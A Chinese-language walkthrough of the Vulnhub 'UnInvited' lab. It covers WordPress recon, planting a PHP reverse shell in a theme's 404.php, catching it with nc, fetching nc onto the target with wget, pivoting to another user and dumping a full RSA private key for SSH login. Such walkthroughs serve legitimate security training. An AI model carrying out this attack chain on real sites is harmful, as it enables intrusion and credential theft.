首页 > 其他分享 >Vulnhub之UnInvited靶机测试过程

Vulnhub之UnInvited靶机测试过程

时间:2023-03-04 18:12:53浏览次数:58  
标签:__ UnInvited http kali 56.146 192.168 Vulnhub 靶机 root

UnInvited

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:b2:b4:d3      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.146  08:00:27:ab:59:15      1      60  PCS Systemtechnik GmbH        

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.146

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.146 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-03 22:55 EST
Nmap scan report for localhost (192.168.56.146)
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: SEC-CORP
7894/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 afd242e431ff4ffb0bde18e93fc4bc42 (RSA)
|   256 97564740ea99b2a61aa559567e2bb4a0 (ECDSA)
|_  256 b2b1674475f6d832a2f2ff7f09a77d53 (ED25519)
60000/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: UNINVITED
MAC Address: 08:00:27:AB:59:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.08 seconds

NMAP扫描结果表明目标主机有3个开放端口:80(http)、7894(ssh)、60000(http)

而且60000端口运行wordpress站点。

获得Shell

Kali Linux利用浏览器访问80端口,从返回页面的源代码中可看到一段注释,将其解码:

</footer>
	<!-- Footer section end -->
	<!--WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=-->

	<!--====== Javascripts & Jquery ======-->
	<script src="js/jquery-3.2.1.min.js"></script>
	<script src="js/bootstrap.min.js"></script>
	<script src="js/owl.carousel.min.js"></script>
	<script src="js/jquery.magnific-popup.min.js"></script>
	<script src="js/circle-progress.min.js"></script>
	<script src="js/main.js"></script>
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=' | base64 -d
Yeah! I know it happens... I guess u might want to add this [fieldforce] to your hosts  v

要添加主机记录:fieldforce

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo vim /etc/hosts                                        
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.146  fieldforce

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ curl http://192.168.56.146/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.146 Port 80</address>
</body></html>
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ nikto -h http://192.168.56.146
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.146
+ Target Hostname:    192.168.56.146
+ Target Port:        80
+ Start Time:         2023-03-03 23:03:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 34af, size: 5abb5cae20433, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-03-03 23:04:02 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ gobuster dir -u http://192.168.56.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.146
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,sh,php,html
[+] Timeout:                 10s
===============================================================
2023/03/03 23:04:55 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/about.html           (Status: 200) [Size: 11039]
/contact.html         (Status: 200) [Size: 7902]
/blog.html            (Status: 200) [Size: 8621]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.146/img/]
/index.html           (Status: 200) [Size: 13487]
/service.html         (Status: 200) [Size: 13090]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.146/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.146/js/]
/elements.html        (Status: 200) [Size: 13628]
/Source               (Status: 301) [Size: 317] [--> http://192.168.56.146/Source/]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1098491 / 1102805 (99.61%)===============================================================
2023/03/03 23:06:58 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ nikto -h http://192.168.56.146:60000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.146
+ Target Hostname:    192.168.56.146
+ Target Port:        60000
+ Start Time:         2023-03-03 23:08:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.146:60000/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'link' found, with contents: <http://fieldforce:60000/wp-json/>; rel="https://api.w.org/"
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (400)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3092: /backdoor/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /server-status: Apache server-status interface found (protected/forbidden)
+ 7923 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2023-03-03 23:10:42 (GMT-5) (136 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 


60000端口扫描出了/backdoor,不过却是wordpress管理后台登录窗口。

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000/backdoor/ -e u,p --wp-content-dir /wp-content
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/backdoor/ [192.168.56.146]
[+] Started: Fri Mar  3 23:13:17 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.38 (Debian)
 |  - X-Powered-By: PHP/7.4.8
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.146:60000/backdoor/e442977.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.146:60000/backdoor/e442977.html, Match: 'WordPress 5.4.2'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Mar  3 23:13:19 2023
[+] Requests Done: 51
[+] Cached Requests: 8
[+] Data Sent: 14.547 KB
[+] Data Received: 243.427 KB
[+] Memory used: 224.445 MB
[+] Elapsed time: 00:00:02
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000/backdoor/ -e u,p --wp-content-dir /wp-content --plugins-detection mixed
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/backdoor/ [192.168.56.146]
[+] Started: Fri Mar  3 23:14:00 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.38 (Debian)
 |  - X-Powered-By: PHP/7.4.8
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.146:60000/backdoor/1688692.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.146:60000/backdoor/1688692.html, Match: 'WordPress 5.4.2'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:21 <============================================> (1500 / 1500) 100.00% Time: 00:00:21
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.56.146:60000/wp-content/plugins/akismet/
 | Latest Version: 5.0.1
 | Last Updated: 2022-11-08T05:36:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] wps-hide-login
 | Location: http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/
 | Last Updated: 2022-05-25T13:06:00.000Z
 | Readme: http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
 | [!] The version is out of date, the latest version is 1.9.6
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/, status: 403
 |
 | Version: 1.5.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Mar  3 23:14:24 2023
[+] Requests Done: 1519
[+] Cached Requests: 51
[+] Data Sent: 453.51 KB
[+] Data Received: 521.992 KB
[+] Memory used: 270.008 MB
[+] Elapsed time: 00:00:23

──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/ [192.168.56.146]
[+] Started: Sat Mar  4 00:07:24 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.38 (Debian)
 |  - X-Powered-By: PHP/7.4.8
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.146:60000/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.146:60000/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.146:60000/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.146:60000/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.146:60000/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.146:60000/, Match: 'WordPress 5.4.2'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] elliot
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.56.146:60000/wp-json/wp/v2/users/?per_page=100&page=1

[+] Elliot
 | Found By: Rss Generator (Aggressive Detection)

[+] 1
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar  4 00:07:35 2023
[+] Requests Done: 46
[+] Cached Requests: 5
[+] Data Sent: 12.027 KB
[+] Data Received: 282.581 KB
[+] Memory used: 145.406 MB
[+] Elapsed time: 00:00:11
                                              

这次扫描出用户名elliot

密码是在网页中的内容:wh1ter0se

用cewl工具形成字典,并没有能够得到上述的密码,有点奇怪。

登录成功后,试图通过修改404.php模板,但是返回错误:

使用另一种方法,仍然是到theme editor, 但此在右边选择其他的theme(也就是没有activate的主题),将404.php替换为shell.php的代码,然后update file,就不会报错。

然后访问该主题下的404.php

总结:在本靶机中wordpress的主题为nanospace,通过修改该主题下的404.php模板文件失败,注意无需真的切换主题,而是在右上侧的Select theme to edit:,选择任意一个theme,比如本例中选择Twenty Nineteen主题,然后修改该主题下的404.php文件,即可成功修改,但是此时404.php文件位置一定要对应Twenty Nineteen主题的目录。

fieldforce:60000/wp-content/themes/twentynineteen/404.php
──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.146] 48992
Linux f950b9c50e1d 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 GNU/Linux
 06:06:22 up  2:27,  0 users,  load average: 3.31, 3.54, 3.46
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@f950b9c50e1d:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@f950b9c50e1d:/$ 

www-data@f950b9c50e1d:/$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.3  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:ac:12:00:03  txqueuelen 0  (Ethernet)
        RX packets 16616729  bytes 18729729659 (17.4 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 17075528  bytes 2087397916 (1.9 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2488485  bytes 130686616 (124.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2488485  bytes 130686616 (124.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

www-data@f950b9c50e1d:/$ 

目前得到的Shell应该在容器里。

www-data@f950b9c50e1d:/home/demodocker/.local$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 demodocker demodocker 4.0K Jul 29  2020 .
drwxr-xr-x 3 demodocker demodocker 4.0K Jul 30  2020 ..
-rw-r--r-- 1 demodocker demodocker   57 Jul 29  2020 note.txt
drwx------ 3 demodocker demodocker 4.0K Jul 28  2020 share
www-data@f950b9c50e1d:/home/demodocker/.local$ cat note.txt
cat note.txt
ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs' | base64 -d
encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'LS0taXAtLS0vZnNvY2lldHkuZXhl' | base64 -d                            
---ip---/fsociety.exe                                                                                                                              

这表示fsociety.exe文件在192.168.56.146/fsociety.exe,下载到windows

用户名输入: elliot 密码为: mrrobot (在网页中有该单词,但是说实话,这太牵强了)

www-data@f950b9c50e1d:/$ which nc
which nc
www-data@f950b9c50e1d:/$ 

靶机上没有nc,可以从Kali Linux下载nc

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ cp /usr/bin/nc .                  
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ ls -alh                                                                     
total 2.9M
drwxr-xr-x  5 kali kali 4.0K Mar  4 04:05 .
drwxr-xr-x 26 kali kali 4.0K Mar  3 22:52 ..
drwxr-xr-x  6 kali kali 4.0K Jun  5  2017 Magnific-Popup-master
-rw-r--r--  1 kali kali 339K Mar  3 23:05 Magnific-Popup-master.zip
drwxr-xr-x  7 kali kali 4.0K Mar  4 00:40 nanospace
-rw-r--r--  1 kali kali 1.7M Mar  4 00:41 nanospace1.zip
-rwxr-xr-x  1 kali kali  35K Mar  4 04:05 nc
-rw-r--r--  1 root root 1.2K Mar  3 22:55 nmap_full_scan
drwxr-xr-x  7 kali kali 4.0K Apr 20  2018 OwlCarousel2-2.3.4
-rw-r--r--  1 kali kali 774K Mar  3 23:05 OwlCarousel2-2.3.4.zip
-rwx------  1 kali kali 5.4K Mar  4 00:21 shell.php
-rw-r--r--  1 kali kali 2.4K Mar  4 00:26 shell.zip
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

www-data@f950b9c50e1d:/tmp$ wget http://192.168.56.206:8000/nc
wget http://192.168.56.206:8000/nc
--2023-03-04 09:05:46--  http://192.168.56.206:8000/nc
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34952 (34K) [application/octet-stream]
Saving to: ‘nc’

nc                  100%[===================>]  34.13K  --.-KB/s    in 0s      

2023-03-04 09:05:46 (853 MB/s) - ‘nc’ saved [34952/34952]

www-data@f950b9c50e1d:/tmp$ ls -alh
ls -alh
total 48K
drwxrwxrwt 1 root     root     4.0K Mar  4 09:05 .
drwxr-xr-x 1 root     root     4.0K Jul 28  2020 ..
-rw-rw-rw- 1 www-data www-data  35K Mar  4 09:05 nc
drwxr-xr-x 5 root     root     4.0K Jul 23  2020 pear
www-data@f950b9c50e1d:/tmp$ chmod 777 nc
chmod 777 nc

根据提示,如果ip为172.18.0.3,则nc监听端口为8888

www-data@f950b9c50e1d:/tmp$ ./nc -nlvp 8888
./nc -nlvp 8888
listening on [any] 8888 ...

www-data@f950b9c50e1d:/tmp$ ./nc -nlvp 8888
./nc -nlvp 8888
listening on [any] 8888 ...
connect to [172.18.0.3] from (UNKNOWN) [172.18.0.1] 54482
id
id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
/home/docksec> ls -alh
ls -alh
total 52K
drwxr-xr-x 7 docksec docksec 4.0K Jul 30  2020 .
drwxr-xr-x 4 root    root    4.0K Jul 28  2020 ..
-rw------- 1 docksec docksec 1.1K Jul 30  2020 .bash_history
-rw-r--r-- 1 docksec docksec  220 Jul 28  2020 .bash_logout
-rw-r--r-- 1 docksec docksec 3.7K Jul 28  2020 .bashrc
drwx------ 2 docksec docksec 4.0K Jul 29  2020 .cache
drwx------ 3 docksec docksec 4.0K Jul 29  2020 .gnupg
drwxrwxr-x 3 docksec docksec 4.0K Jul 28  2020 .local
-rw-r--r-- 1 docksec docksec  807 Jul 28  2020 .profile
drwx------ 2 docksec docksec 4.0K Jul 29  2020 .secret
-rw-rw-r-- 1 docksec docksec   66 Jul 29  2020 .selected_editor
drwx------ 2 docksec docksec 4.0K Jul 29  2020 .ssh
-r-------- 1 docksec docksec  318 Jul 28  2020 user1.txt
/home/docksec> cat user1.txt
cat user1.txt
 _______ __   __ ___ ___     _______ 
|       |  |_|  |   |   |   |       |
|  _____|       |   |   |   |    ___|
| |_____|       |   |   |   |   |___ 
|_____  |       |   |   |___|    ___|
 _____| | ||_|| |   |       |   |___ 
|_______|_|   |_|___|_______|_______|


FLAG{DASDGFGPXLCKDEG5D7635CSDAFDIMMJDSUWEQDSADIG}
/home/docksec> cd .ssh
cd .ssh
www-data@f950b9c50e1d:/tmp$ ls -alh
ls -alh
total 48K
drwxrwxrwt 1 root     root     4.0K Mar  4 09:05 .
drwxr-xr-x 1 root     root     4.0K Jul 28  2020 ..
-rwxrwxrwx 1 www-data www-data  35K Mar  4 09:05 nc
drwxr-xr-x 5 root     root     4.0K Jul 23  2020 pear
www-data@f950b9c50e1d:/tmp$ 

/home/docksec> cat ./.ssh/id_rsa
cat ./.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA5poDIBZv6tjox5ZNEDm3zqJ6mk+bteyhJ4mm3Vy1EbP4r1II
5oBP9MkvTXR+fgp0gtxZRuk6qptw29nZc+xONo6J4uLBsPbYyFYTctLjmGnZKDkQ
d8rvsj946u+yGo+YLa7k189YkcAX7Cxzsoe08z7rnjo8g01zW0dPhwDprLdnWIOm
CCF5u/57J9o4qOLVmMiSV/Bmhx+GSSNJzsjFq9yyd6A/Qd/FyT8v8HcHR0xH12oS
UgLO7pZ+/LtTpNDFbbYqhz8vb7LCeSBxAfXQCGpdh1RaELaGysgXYfrZo1yUQoD/
JfMrocQW5UmdfzFuN4jhQJMhHm606loIaEKeIwIDAQABAoIBAQDPGNfftGbUifMc
c/5HqR5LBB6JgR89VgMxB+2E9eJjwLaBdXIq2Gd2VkwWCp4jQe57K7s99O3MFIdZ
2p7w/fMMCh0JV05OSJJN8QfMYlsmIUF2XzFL9EQqV9iXXacdNYKc3GoG6t8HHnYd
k5pgZoH6xrJCStjXrvH/st5YR1iU0/jCbZekuSsCnuZMOhUaEBZpf/eJGcOvcoot
TCUyztHli6JCPS6YWaYqE5K6D1eWrWY45GmRnkv5QjZch6YXzUs2CgCyYtngM9Ed
69Plcj7CfQSxIE0mffyrJnMM3V0cHwCd+uSehGD+ty5H4TpYL3W6Ler3L4u8w4dj
S5Qc0FKpAoGBAP0uLBZq5lCnTw47+oPvGagMaSaFZMRatOIeDfyI3leD3Wux4q56
ms3zZotSRStygce879GNSq+kENI9iOmQ2wT6FzaC4ddGmOTmRDpvN41T8ejShMEp
QRYSLi9cqJnYZGyDzw3VOX0CPe2RrzkT/Xtktpvgbks50DP/LxpFdUQtAoGBAOkr
d49lNKedHx4GWQadFR93Y5REtMSTy4vFw5OTHqboQcXZRJfJmqJVZJOqQ69B16Ul
phKM3Ptckmc1MNiIPiq9Uptsmlu+jDaQ66naEgkvA9gmG32ubVuzAdd6ab2322fx
qABZkEW9AAJQv2JNl5rwRyRhLmMtZO2iwcdXQE2PAoGAbpNO4A+aPZmE9pONizfP
Pc0F07Qo2XVAUQ2NUEE60oAeIZ4Ugd28ZLysiabJ3Prq4aCMITqTZvjB/ACyHkiM
z7SmlME+/7WuqzJClD7kxU3ndqcTIgXxjkEseLUAUgjne1lqAgGhVQ64m1yoacZo
TA8ljhjMMwCyBTOrj87MM5UCgYABSbYtWpfB3UJQviQ7vx5gwB4SsZZ2B4L2UK9V
31gp/9ptJ1gTpo9uGh6mGiipjSmNxfl23MRTtx0v6MFOUOJXBhiwtxbbLuBDZOWI
WKYE2vegeAVq2k3MVd7Ku+hdneheWJ1e8x+y4upfGOcVuev+dRlPgCHrdlK6ZU3A
tiCqzQKBgQD0hAVF+02lZT3yD6wl1m5yiA24Fy2cYNVEVhvqh7E99dODh9ZD+4Kw
I0CofNKqzmFiurY8IFsSKGiLV1siPDx4WrMyCNct/mxJjF0zW3wnBc+th7g/f8Yq
47g7MLormAOzhVOi7kWd4HoIgC3+qzhqS6YVP35c4Pxjcvcv0K1Bbw==
-----END RSA PRIVATE KEY-----
/home/docksec> 

┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ ssh -i id_rsa [email protected] -p 7894
The authenticity of host '[192.168.56.146]:7894 ([192.168.56.146]:7894)' can't be established.
ED25519 key fingerprint is SHA256:TDHE9jZRgNWTCsD16WZXDrJFcTVA6M9yWrX7pXR0VyY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
